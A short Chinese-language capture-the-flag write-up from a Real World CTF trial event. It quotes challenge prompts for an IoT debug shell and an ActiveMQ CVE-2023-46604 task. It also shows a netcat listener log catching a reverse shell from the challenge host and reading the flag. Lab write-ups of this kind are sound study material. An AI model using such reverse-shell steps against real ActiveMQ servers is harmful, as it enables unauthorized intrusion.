闲来无事,报名了只有国际赛40%左右难度的体验赛,简单看了看题目,嗯,一题不会。不过后面想了想 Real World 应该都是考察最近的 CVE,最终做了 4 题,排名还很靠前,感觉还可以。另外 Be-an-Interpreter-Hacker 应该是 CVE-2023-28879 但是未成功…
vision
This is the debug console of an IoT device. The device is not intended to provide the shell. For debugging purposes, the vendor provides a protected shell to execute basic debug commands. Are you able to access the unrestricted shell for this device?
Welcome, seekers, to the game, Where ActiveMQ’s name is not the same. In this world of messages and queues, A hidden flaw, in the news.
CVE-2023-46604, a code that’s key, A vulnerability, you’ll soon see. In this challenge, you are tasked, To uncover secrets, masked and masked.
Explore the depths of ActiveMQ’s lair, Where messages flow with utmost care. But within this stream, a flaw does lie, A door unlocked, beneath the sky.
Your mission, should you dare to dive, Is to find this flaw, make it alive. Exploit the gap, show your skill, In this cyber world, where time stands still.
This is your chance to learn and probe, In a digital world across the globe. Seek the flaw in ActiveMQ’s core, And open the door to cybersecurity lore.
So embark on this quest, both far and nigh, Where codes and messages, in layers lie. Find the key to CVE’s mystery, And etch your name in cyber history!
┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvp 5000 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Listening on :::5000 Ncat: Listening on 0.0.0.0:5000 Ncat: Connection from 120.26.63.137. Ncat: Connection from 120.26.63.137:33094. bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell
activemq@76390a168383:~$ cd / activemq@76390a168383:/$ ./readflag rwctf{N0w_Y0ur_4r3_G0od_H4ck3r_6d6}
Be-a-Security-Researcher
Participate in a security vulnerability emergency response